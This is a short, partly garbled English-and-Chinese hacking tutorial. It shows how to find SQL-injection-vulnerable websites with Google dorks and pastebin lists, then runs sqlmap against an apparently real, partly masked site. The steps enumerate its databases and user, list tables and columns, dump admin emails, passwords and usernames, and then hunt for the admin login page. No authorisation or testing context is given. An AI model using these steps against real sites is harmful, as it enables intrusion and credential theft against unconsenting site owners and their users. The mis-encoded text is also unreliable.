There is 3 ways to find sqli vulnerable websites:

1-

2- Dork : http://encyberpedia.blogspot.com/2013/03/5000-sql-injection-dorks.html

Google Dorks

3- Type "SQL Vulnerable Website pastebin/List" , i like this

使用sqlmap進行試驗：

Google?Dorks:

這次使用：

inurl:.course.php?id=16

1.?對目標網(wǎng)站進行查詢：

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16

//sqlmap?-V?1.0.11,會生成相關(guān)文件，包含payload以及注入類型

參數(shù)介紹：

Parameter:?id?(GET)，注入?yún)?shù)為GET注入：

注入類型有：

boolean-based?blind???????//基于布爾的盲注，也就是可以根據(jù)返回頁面判斷條件真假的注入

error-based???//報錯型注入

time-based?blind??//基于時間延遲注入

UNION?query?????//可聯(lián)合查詢注入

此外還有一種為：

stacked?queries?SQL?injection???//可多語句查詢注入

the?back-end?DBMS?is?MySQL，back-end?DBMS:?MySQL?>=?5.0使用數(shù)據(jù)庫為MYSQL，版本為5.x

web?application?technology:?PHP?5.3.29//Web應(yīng)用程序技術(shù)

2.得到數(shù)據(jù)庫：

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--dbs

[*]efnypvon_icd_db

[*]information_schema

3.web當(dāng)前使用的數(shù)據(jù)庫

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--current-db

current?database:????'efnypvon_icd_db'

4.web數(shù)據(jù)庫所使用的賬戶

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--current-user

current?user:????'efnypvon_icd_usr@localhost'

5.具體查看某一數(shù)據(jù)庫：

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?--tables

6.查看表的字段

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?-T?icd_tbl_admin?--columns

7.得到字段內(nèi)容：

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?-T?icd_tbl_admin?"fEmail,fPassword,fUserName,last_admiin,superadmin"?--dump

8.尋找登陸界面

/admin.php???/login.php???/backoffice/login.php?....???:O

Thats?all?:D